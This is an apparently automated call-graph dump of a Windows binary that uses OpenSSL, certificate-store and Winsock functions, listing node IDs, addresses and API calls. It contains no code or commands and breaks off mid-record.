117007->117004 117008 7ff8a92e4588 117117 7ff8a92fa030 117008->117117 117010 7ff8a92e4590 117011 7ff8a92e4594 ERR_new 117010->117011 117012 7ff8a92e45a0 117010->117012 117011->117004 117126 7ff8a92fa8b0 117012->117126 117014 7ff8a92e45a8 117015 7ff8a92e45ac ERR_new 117014->117015 117016 7ff8a92e45b8 117014->117016 117015->117004 117144 7ff8a92de900 117016->117144 117019 7ff8a92e45cc ERR_new 117019->117004 117020 7ff8a92e45db 117150 7ff8a92dd360 117020->117150 117022 7ff8a92e45eb 117023 7ff8a92e4609 117022->117023 117024 7ff8a92e45fa ERR_new 117022->117024 117157 7ff8a92e02b0 117023->117157 117024->117004 117027 7ff8a92e4845 ERR_new ERR_set_debug 117027->116984 117028 7ff8a92e4635 OPENSSL_sk_num 117028->117027 117029 7ff8a92e4646 117028->117029 117030 7ff8a92e4657 ERR_new 117029->117030 117031 7ff8a92e4666 117029->117031 117030->117031 117193 7ff8a92eef20 117031->117193 117034 7ff8a92eef20 5 API calls 117035 7ff8a92e468d OPENSSL_sk_new_null 117034->117035 117036 7ff8a92e46a5 ERR_new 117035->117036 117037 7ff8a92e46b4 OPENSSL_sk_new_null 117035->117037 117036->117037 117038 7ff8a92e46c5 ERR_new 117037->117038 117039 7ff8a92e46d4 CRYPTO_new_ex_data 117037->117039 117038->117039 117040 7ff8a92e46ec ERR_new 117039->117040 117041 7ff8a92e46fb 117039->117041 117040->117041 117041->116988 117042 7ff8a92e473b RAND_bytes_ex 117041->117042 117199 7ff8a92de880 CRYPTO_THREAD_run_once 117041->117199 117044 7ff8a92e47a3 117042->117044 117045 7ff8a92e476b RAND_priv_bytes_ex 117042->117045 117048 7ff8a92e47ae RAND_priv_bytes_ex 117044->117048 117045->117044 117047 7ff8a92e4785 RAND_priv_bytes_ex 117045->117047 117046 7ff8a92e4734 117046->117042 117047->117044 117047->117048 117049 7ff8a92e47ec 117048->117049 117050 7ff8a92e47c8 ERR_new ERR_set_debug 117048->117050 117051 7ff8a92e4807 117049->117051 117052 7ff8a92e47f8 ERR_new 117049->117052 117050->116984 117200 7ff8a92f04f0 70 API calls 117051->117200 117052->117051 117055 7ff8a92e2f60 117054->117055 117056 7ff8a92e2f6c 117055->117056 117057 7ff8a92e2fba 117055->117057 117058 7ff8a92e2f75 ERR_new ERR_set_debug ERR_set_error 117056->117058 117059 7ff8a92e2fad 117056->117059 117057->117059 117060 7ff8a92e2fd9 CRYPTO_THREAD_run_once 117057->117060 117058->117059 117059->116979 117060->117059 117061 7ff8a92e2ffd 117060->117061 117062 7ff8a92e3004 CRYPTO_THREAD_run_once 117061->117062 117063 7ff8a92e3026 117061->117063 117062->117059 117062->117063 117064 7ff8a92e302d CRYPTO_THREAD_run_once 117063->117064 117065 7ff8a92e305e 117063->117065 117064->116979 117065->116979 117202 7ff8a935edf0 117066->117202 117069 7ff8a92dc024 117069->116982 117069->116983 117071 7ff8a92e0ec9 117070->117071 117074 7ff8a92e0f24 117071->117074 117204 7ff8a92eee40 ERR_set_mark OBJ_nid2sn EVP_CIPHER_fetch ERR_pop_to_mark ENGINE_finish 117071->117204 117073 7ff8a92eef20 5 API calls 117073->117074 117074->117073 117075 7ff8a92e0f65 EVP_MD_get_size 117074->117075 117077 7ff8a92e0f8b ERR_set_mark EVP_SIGNATURE_fetch 117074->117077 117075->117074 117076 7ff8a92e13ae 117075->117076 117076->117001 117078 7ff8a92e0fb2 117077->117078 117079 7ff8a92e0fc3 EVP_KEYEXCH_fetch 117078->117079 117080 7ff8a92e0fde 117079->117080 117081 7ff8a92e0ff2 EVP_KEYEXCH_fetch 117080->117081 117082 7ff8a92e100d 117081->117082 117083 7ff8a92e1019 EVP_KEYEXCH_free 117081->117083 117084 7ff8a92e1021 EVP_SIGNATURE_fetch 117082->117084 117083->117084 117085 7ff8a92e1045 EVP_SIGNATURE_free 117084->117085 117086 7ff8a92e103c 117084->117086 117087 7ff8a92e104d ERR_pop_to_mark EVP_PKEY_asn1_find_str 117085->117087 117086->117087 117088 7ff8a92e10af EVP_PKEY_asn1_get0_info 117087->117088 117089 7ff8a92e10ce 117087->117089 117088->117089 117090 7ff8a92e10fc EVP_PKEY_asn1_find_str 117089->117090 117091 7ff8a92e111f EVP_PKEY_asn1_get0_info 117090->117091 117092 7ff8a92e113e 117090->117092 117091->117092 117093 7ff8a92e116f EVP_PKEY_asn1_find_str 117092->117093 117094 7ff8a92e1192 EVP_PKEY_asn1_get0_info 117093->117094 117095 7ff8a92e11b1 117093->117095 117094->117095 117096 7ff8a92e11e2 EVP_PKEY_asn1_find_str 117095->117096 117097 7ff8a92e1205 EVP_PKEY_asn1_get0_info 117096->117097 117098 7ff8a92e1224 117096->117098 117097->117098 117099 7ff8a92e1255 EVP_PKEY_asn1_find_str 117098->117099 117100 7ff8a92e1278 EVP_PKEY_asn1_get0_info 117099->117100 117101 7ff8a92e1297 117099->117101 117100->117101 117102 7ff8a92e12b4 EVP_PKEY_asn1_find_str 117101->117102 117103 7ff8a92e12d7 EVP_PKEY_asn1_get0_info 117102->117103 117105 7ff8a92e12f6 117102->117105 117103->117105 117104 7ff8a92e1313 EVP_PKEY_asn1_find_str 117106 7ff8a92e1336 EVP_PKEY_asn1_get0_info 117104->117106 117107 7ff8a92e1355 117104->117107 117105->117104 117106->117107 117107->117001 117109 7ff8a935edf0 117108->117109 117110 7ff8a92f9f45 OSSL_PROVIDER_do_all 117109->117110 117111 7ff8a92fa00a 117110->117111 117114 7ff8a92f9f76 117110->117114 117112 7ff8a935ee50 8 API calls 117111->117112 117113 7ff8a92e4578 117112->117113 117113->117007 117113->117008 117114->117111 117115 7ff8a92f9fce CRYPTO_malloc 117114->117115 117115->117111 117116 7ff8a92f9ff3 memcpy 117115->117116 117116->117111 117118 7ff8a935edf0 117117->117118 117119 7ff8a92fa03c OSSL_PROVIDER_do_all 117118->117119 117120 7ff8a92fa120 117119->117120 117121 7ff8a92fa05c 117119->117121 117120->117010 117122 7ff8a92fa106 117121->117122 117123 7ff8a92fa06a CRYPTO_free CRYPTO_zalloc 117121->117123 117122->117010 117123->117120 117124 7ff8a92fa0ac 117123->117124 117124->117122 117125 7ff8a92fa0d0 OBJ_txt2nid 117124->117125 117125->117122 117125->117125 117127 7ff8a935edf0 117126->117127 117128 7ff8a92fa8c2 EVP_PKEY_new 117127->117128 117129 7ff8a92fab54 CRYPTO_free CRYPTO_free EVP_PKEY_free 117128->117129 117130 7ff8a92fa8ee CRYPTO_malloc 117128->117130 117129->117014 117131 7ff8a92fa931 117130->117131 117132 7ff8a92fab4c 117130->117132 117131->117132 117133 7ff8a92fa93a CRYPTO_malloc 117131->117133 117132->117129 117133->117132 117134 7ff8a92fa964 ERR_set_mark 117133->117134 117138 7ff8a92fa9b0 117134->117138 117135 7ff8a92fa9e4 EVP_PKEY_set_type 117136 7ff8a92fa9f7 EVP_PKEY_CTX_new_from_pkey 117135->117136 117135->117138 117137 7ff8a92faa10 EVP_PKEY_CTX_free 117136->117137 117136->117138 117137->117138 117138->117135 117138->117137 117140 7ff8a92faa2a 117138->117140 117139 7ff8a92faafd ERR_pop_to_mark 117139->117132 117140->117139 117141 7ff8a92faa9a OBJ_txt2nid 117140->117141 117142 7ff8a92faaac OBJ_txt2nid OBJ_txt2nid 117140->117142 117141->117140 117142->117140 117143 7ff8a92faaf5 117142->117143 117143->117139 117145 7ff8a92de910 117144->117145 117205 7ff8a92dedf0 117145->117205 117147 7ff8a92de91e 117148 7ff8a92de93d 117147->117148 117214 7ff8a92e1430 12 API calls 117147->117214 117148->117019 117148->117020 117151 7ff8a92dd370 117150->117151 117152 7ff8a92dd3d2 117151->117152 117153 7ff8a92dd37c CRYPTO_zalloc 117151->117153 117152->117022 117153->117152 117154 7ff8a92dd398 CRYPTO_zalloc 117153->117154 117155 7ff8a92dd3df 117154->117155 117156 7ff8a92dd3bf CRYPTO_free 117154->117156 117155->117022 117156->117152 117159 7ff8a92e02da 117157->117159 117158 7ff8a92e08ed 117158->117027 117158->117028 117159->117158 117215 7ff8a92dea30 7 API calls 117159->117215 117161 7ff8a92e032e 117161->117158 117162 7ff8a92e0370 CRYPTO_malloc 117161->117162 117166 7ff8a92e0395 117161->117166 117162->117158 117162->117166 117164 7ff8a92e08d4 117165 7ff8a92e08d8 CRYPTO_free 117164->117165 117170 7ff8a92e0903 CRYPTO_malloc 117164->117170 117165->117158 117216 7ff8a92e0130 CRYPTO_zalloc CRYPTO_free 117166->117216 117168 7ff8a92e0b35 strncmp 117171 7ff8a92e0c5a 117168->117171 117172 7ff8a92e0c3c 117168->117172 117170->117168 117174 7ff8a92e0c93 CRYPTO_free 117171->117174 117218 7ff8a92dfbb0 13 API calls 117171->117218 117217 7ff8a92dfbb0 13 API calls 117172->117217 117176 7ff8a92e0cad 117174->117176 117177 7ff8a92e0cb8 OPENSSL_sk_new_null 117174->117177 117176->117177 117179 7ff8a92e0cc5 117177->117179 117180 7ff8a92e0cd0 OPENSSL_sk_num 117177->117180 117178 7ff8a92e0c90 117178->117174 117179->117180 117181 7ff8a92e0cdc 117180->117181 117182 7ff8a92e0d5a 117180->117182 117183 7ff8a92e0cf0 OPENSSL_sk_value 117181->117183 117185 7ff8a92e0d40 OPENSSL_sk_delete 117181->117185 117189 7ff8a92e0d0f OPENSSL_sk_push 117181->117189 117184 7ff8a92e0d82 CRYPTO_free OPENSSL_sk_dup 117182->117184 117186 7ff8a92e0d6a OPENSSL_sk_push 117182->117186 117183->117181 117183->117185 117187 7ff8a92e0da7 OPENSSL_sk_free OPENSSL_sk_set_cmp_func OPENSSL_sk_sort OPENSSL_sk_free 117184->117187 117188 7ff8a92e0d33 OPENSSL_sk_free 117184->117188 117190 7ff8a92e0d4c OPENSSL_sk_num 117185->117190 117186->117182 117191 7ff8a92e0d1e CRYPTO_free 117186->117191 117187->117158 117188->117158 117189->117190 117189->117191 117190->117182 117190->117183 117191->117188 117194 7ff8a92eef35 117193->117194 117219 7ff8a9303f90 117194->117219 117196 7ff8a92eef47 117197 7ff8a92e4676 117196->117197 117198 7ff8a92eef4c ERR_set_mark OBJ_nid2sn EVP_MD_fetch ERR_pop_to_mark 117196->117198 117197->117034 117198->117197 117199->117046 117200->116977 117201->116977 117203 7ff8a92dbffa CRYPTO_THREAD_run_once 117202->117203 117203->117069 117204->117071 117206 7ff8a935edf0 117205->117206 117207 7ff8a92dee05 OPENSSL_sk_new_null 117206->117207 117208 7ff8a92dee83 117207->117208 117209 7ff8a92dee1b 117207->117209 117208->117147 117210 7ff8a92dee95 OPENSSL_sk_free 117209->117210 117211 7ff8a92dee20 CONF_parse_list 117209->117211 117210->117147 117212 7ff8a92dee41 OPENSSL_sk_num 117211->117212 117213 7ff8a92dee4d ERR_new ERR_set_debug ERR_set_error OPENSSL_sk_free 117211->117213 117212->117210 117212->117213 117213->117208 117214->117148 117215->117161 117216->117164 117217->117171 117218->117178 117220 7ff8a9303fa0 117219->117220 117221 7ff8a9303fd5 117220->117221 117222 7ff8a9303fbc ENGINE_finish 117220->117222 117221->117196 117222->117196 117223 7ff8b83c04a6 117231 7ff8b83c04ae 117223->117231 117224 7ff8b83c091b calloc 117225 7ff8b83c0c22 117224->117225 117226 7ff8b83c093c 117224->117226 117228 7ff8b83c1069 117225->117228 117340 7ff8b83c0c63 117225->117340 117345 7ff8b8374a70 14 API calls 117226->117345 117227 7ff8b83c0549 117227->117224 117234 7ff8b83c05c3 wcschr 117227->117234 117235 7ff8b83c0591 117227->117235 117334 7ff8b83c096b 117227->117334 117237 7ff8b83c10b0 117228->117237 117250 7ff8b8374b60 18 API calls 117228->117250 117331 7ff8b83c0ef7 117228->117331 117230 7ff8b83c07c5 117232 7ff8b83c0975 117230->117232 117238 7ff8b83c07dc CertOpenStore 117230->117238 117231->117227 117248 7ff8b83c05a6 117231->117248 117244 7ff8b83c09a3 117232->117244 117245 7ff8b83c0998 free 117232->117245 117233 7ff8b83c094b 117239 7ff8b83c0955 CertFreeCertificateContext 117233->117239 117240 7ff8b83c095b 117233->117240 117236 7ff8b83c05dc wcsncmp 117234->117236 117274 7ff8b83c0738 117234->117274 117235->117230 117243 7ff8b83c0796 117235->117243 117241 7ff8b83c0607 wcsncmp 117236->117241 117242 7ff8b83c05fc wcschr 117236->117242 117251 7ff8b83c10b7 117237->117251 117330 7ff8b83c10d0 117237->117330 117246 7ff8b83c0804 117238->117246 117247 7ff8b83c086b free CryptStringToBinaryW 117238->117247 117239->117240 117252 7ff8b83c0960 CertCloseStore 117240->117252 117240->117334 117241->117242 117253 7ff8b83c0629 wcsncmp 117241->117253 117268 7ff8b83c06fa 117242->117268 117242->117274 117343 7ff8b8374a70 14 API calls 117243->117343 117255 7ff8b83c09ac fseek 117244->117255 117290 7ff8b83c0a85 117244->117290 117245->117244 117266 7ff8b83c0809 GetLastError 117246->117266 117256 7ff8b83c08b1 117247->117256 117257 7ff8b83c08c8 CertFindCertificateInStore 117247->117257 117375 7ff8b8374a70 14 API calls 117248->117375 117249 7ff8b83c9e10 8 API calls 117258 7ff8b83c1361 117249->117258 117250->117237 117352 7ff8b8374a70 14 API calls 117251->117352 117252->117334 117253->117242 117263 7ff8b83c064b wcsncmp 117253->117263 117264 7ff8b83c0a1d 117255->117264 117265 7ff8b83c09cc ftell 117255->117265 117270 7ff8b83c08ba free 117256->117270 117271 7ff8b83c0c0d CertCloseStore 117256->117271 117272 7ff8b83c08f7 free 117257->117272 117273 7ff8b83c0905 117257->117273 117259 7ff8b83c1300 117374 7ff8b8374a70 14 API calls 117259->117374 117261 7ff8b83c10eb strtol 117275 7ff8b83c1101 strchr 117261->117275 117261->117330 117263->117242 117277 7ff8b83c066a wcsncmp 117263->117277 117278 7ff8b83c09db 117264->117278 117281 7ff8b83c0a22 fseek 117264->117281 117265->117264 117265->117278 117344 7ff8b8374a70 14 API calls 117266->117344 117268->117274 117301 7ff8b83c0716 _wcsdup 117268->117301 117270->117271 117271->117334 117272->117273 117273->117271 117282 7ff8b83c090e 117273->117282 117274->117235 117274->117259 117275->117330 117276 7ff8b83c07c0 117300 7ff8b83c0858 free 117276->117300 117276->117334 117277->117242 117286 7ff8b83c0689 wcsncmp 117277->117286 117297 7ff8b83c0a4e fclose 117278->117297 117298 7ff8b83c09ec fread 117278->117298 117280 7ff8b83c131b free 117280->117334 117281->117278 117288 7ff8b83c0a3a malloc 117281->117288 117282->117224 117283 7ff8b83c0ab9 malloc 117291 7ff8b83c0ad3 117283->117291 117292 7ff8b83c0b69 117283->117292 117284 7ff8b83c1299 CertFreeCertificateContext 117285 7ff8b83c129f 117284->117285 117285->117334 117354 7ff8b83ae4c0 GetLastError _errno 117285->117354 117286->117242 117296 7ff8b83c06a8 wcsncmp 117286->117296 117287 7ff8b83c0838 free 117287->117276 117299 7ff8b83c0846 free 117287->117299 117288->117278 117289 7ff8b83c11d4 strchr 117289->117330 117289->117331 117290->117283 117290->117290 117302 7ff8b83c0ad8 MultiByteToWideChar 117291->117302 117325 7ff8b83c0b0a 117291->117325 117294 7ff8b83c0b77 117292->117294 117295 7ff8b83c0b6e free 117292->117295 117293 7ff8b83c0d42 strchr 117293->117340 117304 7ff8b83c0bc2 CertFindCertificateInStore 117294->117304 117305 7ff8b83c0b80 GetLastError 117294->117305 117295->117294 117296->117242 117308 7ff8b83c06c7 wcsncmp 117296->117308 117309 7ff8b83c0a57 117297->117309 117298->117297 117307 7ff8b83c0a06 fclose 117298->117307 117299->117276 117300->117334 117301->117238 117301->117274 117302->117325 117304->117282 117315 7ff8b83c0bf0 GetLastError 117304->117315 117312 7ff8b83c0b93 117305->117312 117313 7ff8b83c0ba9 117305->117313 117306 7ff8b83c118c strncmp 117316 7ff8b83c11a6 strncmp 117306->117316 117306->117330 117307->117309 117314 7ff8b83c0a14 117307->117314 117308->117242 117308->117274 117346 7ff8b8374a70 14 API calls 117309->117346 117310 7ff8b83c0e89 117326 7ff8b83c0edc 117310->117326 117310->117331 117347 7ff8b8374a70 14 API calls 117312->117347 117348 7ff8b8374a70 14 API calls 117313->117348 117314->117290 117349 7ff8b8374a70 14 API calls 117315->117349 117322 7ff8b83c11fd 117316->117322 117316->117330 117318 7ff8b83c0d7a strncmp 117318->117340 117353 7ff8b8374a70 14 API calls 117322->117353 117324 7ff8b83c0a72 free 117324->117334 117337 7ff8b83c0b56 PFXImportCertStore free 117325->117337 117351 7ff8b8374a70 14 API calls 117326->117351 117327 7ff8b83c0da6 strncmp 117327->117340 117328 7ff8b83c12c8 free 117328->117334 117329 7ff8b83c0b9f 117329->117334 117330->117261 117330->117289 117330->117306 117330->117331 117336 7ff8b83c1155 strncmp 117330->117336 117331->117284 117331->117285 117334->117249 117335 7ff8b83c0dd7 strncmp 117335->117340 117336->117330 117337->117292 117338 7ff8b83c0e0b strncmp 117338->117340 117339 7ff8b83c0e8b 117350 7ff8b8374a70 14 API calls 117339->117350 117340->117293 117340->117310 117340->117318 117340->117327 117340->117331 117340->117335 117340->117338 117340->117339 117341 7ff8b83c0e3f strncmp 117340->117341 117341->117339 117341->117340 117343->117276 117344->117287 117345->117233 117346->117324 117347->117329 117348->117334 117349->117271 117350->117334 117351->117334 117352->117334 117353->117334 117357 7ff8b83ae507 117354->117357 117372 7ff8b83ae500 117354->117372 117355 7ff8b83c9e10 8 API calls 117356 7ff8b83aea3e 117355->117356 117373 7ff8b8374a70 14 API calls 117356->117373 117359 7ff8b83ae9d1 117357->117359 117366 7ff8b83ae533 117357->117366 117361 7ff8b8394eb0 8 API calls 117359->117361 117370 7ff8b83ae58d 117361->117370 117362 7ff8b83ae573 117367 7ff8b8394eb0 8 API calls 117362->117367 117363 7ff8b83ae9eb 117365 7ff8b8394eb0 8 API calls 117363->117365 117364 7ff8b83ae9fb _errno 117368 7ff8b83aea17 GetLastError 117364->117368 117369 7ff8b83aea0e _errno 117364->117369 117365->117364 117376 7ff8b83af5b0 117366->117376 117367->117370 117371 7ff8b83aea22 SetLastError 117368->117371 117368->117372 117369->117368 117370->117364 117371->117372 117372->117355 117373->117328 117374->117280 117375->117334 117377 7ff8b83af5de FormatMessageW 117376->117377 117382 7ff8b83af5d7 117376->117382 117378 7ff8b83af61e wcstombs 117377->117378 117379 7ff8b83af63f strchr 117377->117379 117381 7ff8b83af636 117378->117381 117379->117382 117380 7ff8b83c9e10 8 API calls 117383 7ff8b83ae561 117380->117383 117381->117379 117382->117380 117383->117362 117383->117363 117384 7ff8b839ad9b 117385 7ff8b839ada3 117384->117385 117387 7ff8b839adb1 117384->117387 117386 7ff8b83998c0 47 API calls 117385->117386 117386->117387 117389 7ff8b839adce 117387->117389 117399 7ff8b839ba90 free free 117387->117399 117390 7ff8b836cfb0 10 API calls 117389->117390 117394 7ff8b8399ee0 117389->117394 117390->117394 117392 7ff8b839b0e4 117393 7ff8b836cfb0 10 API calls 117393->117394 117394->117392 117394->117393 117395 7ff8b8374a70 14 API calls 117394->117395 117396 7ff8b836a330 41 API calls 117394->117396 117397 7ff8b839ba90 free free 117394->117397 117398 7ff8b83998c0 47 API calls 117394->117398 117400 7ff8b839f2d0 16 API calls 117394->117400 117395->117394 117396->117394 117397->117394 117398->117394 117399->117389 117400->117394 117401 7ff8b8362940 117402 7ff8b8394eb0 8 API calls 117401->117402 117403 7ff8b836297f 117402->117403 117420 7ff8b83716f0 getaddrinfo 117403->117420 117406 7ff8b83629be EnterCriticalSection 117408 7ff8b83629cd LeaveCriticalSection 117406->117408 117409 7ff8b83629e9 117406->117409 117407 7ff8b836299b WSAGetLastError 117410 7ff8b83629a5 WSAGetLastError 117407->117410 117414 7ff8b83629b2 117407->117414 117411 7ff8b83628c0 117408->117411 117412 7ff8b8362a19 LeaveCriticalSection 117409->117412 117413 7ff8b83629f3 send 117409->117413 117410->117406 117410->117414 117415 7ff8b83629de free 117411->117415 117417 7ff8b8362a29 117412->117417 117413->117412 117416 7ff8b8362a10 WSAGetLastError 117413->117416 117414->117406 117415->117417 117416->117412 117418 7ff8b83c9e10 8 API calls 117417->117418 117419 7ff8b8362a38 117418->117419 117421 7ff8b8362995 117420->117421 117423 7ff8b837171d 117420->117423 117421->117406 117421->117407 117422 7ff8b837186e WSASetLastError 117422->117421 117423->117422 117423->117423 117424 7ff8b8371822 117423->117424 117425 7ff8b837179a malloc 117423->117425 117426 7ff8b837183e freeaddrinfo 117424->117426 117427 7ff8b8371844 117424->117427 117428 7ff8b83717af memmove 117425->117428 117429 7ff8b8371824 117425->117429 117426->117427 117430 7ff8b8371869 117427->117430 117431 7ff8b8371849 117427->117431 117432 7ff8b83717eb memmove 117428->117432 117433 7ff8b8371802 117428->117433 117429->117424 117430->117421 117430->117422 117431->117421 117434 7ff8b8371850 free 117431->117434 117432->117433 117433->117423 117434->117421 117434->117434 117435 7ff8b8362380 117436 7ff8b83623c8 117435->117436 117440 7ff8b83623cd 117435->117440 117445 7ff8b83843b0 117436->117445 117438 7ff8b83b3b60 2 API calls 117439 7ff8b836241b 117438->117439 117450 7ff8b8362a50 calloc 117439->117450 117440->117438 117443 7ff8b836243a 117446 7ff8b8384400 socket 117445->117446 117449 7ff8b83843be 117445->117449 117447 7ff8b8384419 117446->117447 117448 7ff8b8384426 closesocket 117446->117448 117447->117440 117448->117440 117449->117440 117451 7ff8b8362bf4 _errno 117450->117451 117452 7ff8b8362aa1 malloc 117450->117452 117477 7ff8b8362436 117451->117477 117453 7ff8b8362b53 117452->117453 117454 7ff8b8362b22 InitializeCriticalSectionEx 117452->117454 117456 7ff8b8362b6d closesocket 117453->117456 117457 7ff8b8362b7b 117453->117457 117485 7ff8b83ab3f0 socket 117454->117485 117456->117457 117459 7ff8b8362b94 free 117457->117459 117460 7ff8b8362b84 DeleteCriticalSection free 117457->117460 117461 7ff8b8362ba7 117459->117461 117460->117459 117463 7ff8b8362bbc free 117461->117463 117464 7ff8b8362bb6 closesocket 117461->117464 117462 7ff8b8362c1c _strdup 117462->117453 117465 7ff8b8362c36 free _strdup 117462->117465 117463->117451 117464->117463 117466 7ff8b8362c58 117465->117466 117467 7ff8b8362c84 117465->117467 117517 7ff8b83748e0 _beginthreadex 117466->117517 117469 7ff8b8362c90 EnterCriticalSection LeaveCriticalSection 117467->117469 117470 7ff8b8362d02 free 117467->117470 117472 7ff8b8362ccb 117469->117472 117473 7ff8b8362cba 117469->117473 117470->117451 117475 7ff8b8362cd8 117472->117475 117476 7ff8b8362cd0 117472->117476 117519 7ff8b8374920 CloseHandle 117473->117519 117482 7ff8b8362ce1 free 117475->117482 117520 7ff8b8374930 WaitForSingleObjectEx CloseHandle 117476->117520 117477->117443 117484 7ff8b8374a70 14 API calls 117477->117484 117478 7ff8b8362c74 _errno 117478->117467 117479 7ff8b8362cc2 117481 7ff8b8362cee 117479->117481 117483 7ff8b8362cf9 closesocket 117481->117483 117482->117481 117483->117470 117484->117443 117486 7ff8b83ab43a 117485->117486 117487 7ff8b83ab43f htonl setsockopt 117485->117487 117490 7ff8b83c9e10 8 API calls 117486->117490 117488 7ff8b83ab661 closesocket closesocket closesocket 117487->117488 117489 7ff8b83ab4c4 bind 117487->117489 117488->117486 117489->117488 117491 7ff8b83ab4e0 getsockname 117489->117491 117492 7ff8b8362b4b 117490->117492 117491->117488 117493 7ff8b83ab4fa 117491->117493 117492->117453 117492->117462 117493->117488 117494 7ff8b83ab504 listen 117493->117494 117494->117488 117495 7ff8b83ab51b socket 117494->117495 117495->117488 117496 7ff8b83ab538 connect 117495->117496 117496->117488 117497 7ff8b83ab554 117496->117497 117521 7ff8b839c2d0 ioctlsocket 117497->117521 117499 7ff8b83ab561 117499->117488 117522 7ff8b83a2110 117499->117522 117502 7ff8b83ab5a4 117503 7ff8b83b3b60 2 API calls 117502->117503 117504 7ff8b83ab5ad 117503->117504 117504->117488 117505 7ff8b83ab5cf send 117504->117505 117510 7ff8b83ab5e2 117505->117510 117506 7ff8b83a2110 17 API calls 117507 7ff8b83ab605 recv 117506->117507 117508 7ff8b83ab625 WSAGetLastError 117507->117508 117507->117510 117509 7ff8b83b3b60 2 API calls 117508->117509 117509->117510 117510->117488 117510->117506 117512 7ff8b83ab6cf 117510->117512 117511 7ff8b83ab717 closesocket 117511->117486 117512->117488 117512->117511 117546 7ff8b839c2d0 ioctlsocket 117512->117546 117514 7ff8b83ab6f9 117514->117488 117547 7ff8b839c2d0 ioctlsocket 117514->117547 117516 7ff8b83ab70f 117516->117488 117516->117511 117518 7ff8b8362c6c 117517->117518 117518->117477 117518->117478 117519->117479 117520->117475 117521->117499 117523 7ff8b83a2164 117522->117523 117524 7ff8b83a214a 117522->117524 117525 7ff8b83a24c5 117523->117525 117526 7ff8b83a2173 WSASetLastError 117523->117526 117527 7ff8b83a24ae Sleep 117523->117527 117524->117523 117528 7ff8b83a218d 117524->117528 117529 7ff8b83a231f 117526->117529 117527->117525 117532 7ff8b83a22f8 117528->117532 117533 7ff8b83a2314 WSASetLastError 117528->117533 117530 7ff8b83c9e10 8 API calls 117529->117530 117531 7ff8b83a2340 accept 117530->117531 117531->117488 117531->117502 117534 7ff8b83a237c 117532->117534 117537 7ff8b83a2307 117532->117537 117533->117529 117535 7ff8b83a2389 select 117534->117535 117536 7ff8b83a230c 117535->117536 117540 7ff8b83a23d0 117536->117540 117545 7ff8b83a23ed 117536->117545 117537->117536 117538 7ff8b83a2360 Sleep 117537->117538 117539 7ff8b83a2353 WSASetLastError 117537->117539 117538->117536 117539->117536 117540->117529 117541 7ff8b83a23d9 WSAGetLastError 117540->117541 117541->117529 117542 7ff8b83a24a7 117542->117527 117543 7ff8b83a2447 __WSAFDIsSet 117544 7ff8b83a2465 __WSAFDIsSet 117543->117544 117543->117545 117544->117545 117545->117542 117545->117543 117545->117544 117546->117514 117547->117516 117548 7ff8b8365ea0 117549 7ff8b8365ede 117548->117549 117550 7ff8b8365ee3 117548->117550 117549->117550 117554 7ff8b8366062 117549->117554 117586 7ff8b83679f0 117549->117586 117552 7ff8b83c9e10 8 API calls 117550->117552 117553 7ff8b836613c 117552->117553 117556 7ff8b8366098 117554->117556 117557 7ff8b8366081 117554->117557 117561 7ff8b83660d0 117556->117561 117564 7ff8b83660aa 117556->117564 117559 7ff8b8374bb0 14 API calls 117557->117559 117558 7ff8b8365fa9 117558->117550 117560 7ff8b836602d 117558->117560 117648 7ff8b8367f90 34 API calls 117558->117648 117559->117550 117560->117550 117568 7ff8b8368110 closesocket 117560->117568 117643 7ff8b83682d0 SleepEx getsockopt 117561->117643 117564->117558 117571 7ff8b83682d0 3 API calls 117564->117571 117565 7ff8b8365f4e WSAGetLastError 117646 7ff8b8367f90 34 API calls 117565->117646 117566 7ff8b8365f36 connect 117566->117565 117568->117550 117570 7ff8b8365fc7 WSASetLastError 117649 7ff8b83aec40 21 API calls 117570->117649 117571->117558 117572 7ff8b8365f62 117575 7ff8b8374bb0 14 API calls 117572->117575 117573 7ff8b83660eb 117576 7ff8b83b3b60 2 API calls 117573->117576 117578 7ff8b8365f85 117575->117578 117579 7ff8b83660f5 117576->117579 117577 7ff8b8365ff5 117580 7ff8b8374b60 18 API calls 117577->117580 117578->117554 117581 7ff8b8365f97 117578->117581 117650 7ff8b8367f90 34 API calls 117579->117650 117580->117560 117647 7ff8b83681a0 31 API calls 117581->117647 117584 7ff8b836610a 117585 7ff8b8374bb0 14 API calls 117584->117585 117585->117550 117587 7ff8b83b3b60 2 API calls 117586->117587 117588 7ff8b8367a2e 117587->117588 117651 7ff8b8368230 117588->117651 117590 7ff8b8367a4f 117591 7ff8b8367ac1 117590->117591 117654 7ff8b836c990 11 API calls 117590->117654 117592 7ff8b8367ae1 117591->117592 117595 7ff8b8368110 closesocket 117591->117595 117596 7ff8b8374bb0 14 API calls 117592->117596 117594 7ff8b8367a73 117597 7ff8b8367b2e 117594->117597 117598 7ff8b8367a7b _errno _errno _errno 117594->117598 117595->117592 117599 7ff8b8367b05 117596->117599 117600 7ff8b8367b65 117597->117600 117601 7ff8b8367b37 setsockopt 117597->117601 117655 7ff8b83aec40 21 API calls 117598->117655 117603 7ff8b83c9e10 8 API calls 117599->117603 117606 7ff8b8374b60 18 API calls 117600->117606 117601->117600 117605 7ff8b8365f04 117603->117605 117604 7ff8b8367aac 117656 7ff8b8374a70 14 API calls 117604->117656 117605->117550 117605->117558 117605->117565 117605->117566 117608 7ff8b8367b82 117606->117608 117609 7ff8b8367ba2 setsockopt 117608->117609 117611 7ff8b8367bf9 117608->117611 117610 7ff8b8367bcf WSAGetLastError 117609->117610 117609->117611 117657 7ff8b83aec40 21 API calls 117610->117657 117612 7ff8b8367c61 getsockopt 117611->117612 117613 7ff8b8367c44 117611->117613 117615 7ff8b8367c88 117612->117615 117616 7ff8b8367c92 setsockopt 117612->117616 117618 7ff8b8367cc9 setsockopt 117613->117618 117628 7ff8b8367df8 117613->117628 117615->117613 117615->117616 117616->117613 117617 7ff8b8367be7 117619 7ff8b8374b60 18 API calls 117617->117619 117620 7ff8b8367cf9 WSAGetLastError 117618->117620 117621 7ff8b8367d0b 117618->117621 117619->117611 117622 7ff8b8367dea 117620->117622 117624 7ff8b8367d16 setsockopt 117621->117624 117623 7ff8b8374b60 18 API calls 117622->117623 117623->117628 117625 7ff8b8367d3f WSAGetLastError 117624->117625 117626 7ff8b8367d5a 117624->117626 117629 7ff8b8374b60 18 API calls 117625->117629 117631 7ff8b8367d65 setsockopt 117626->117631 117628->117591 117658 7ff8b839c2d0 ioctlsocket 117628->117658 117629->117626 117630 7ff8b8367e9a 117632 7ff8b8367e9e WSAGetLastError 117630->117632 117633 7ff8b8367eb5 117630->117633 117634 7ff8b8367d8e WSAGetLastError 117631->117634 117635 7ff8b8367da9 117631->117635 117632->117591 117633->117591 117636 7ff8b8367ecc 117633->117636 117637 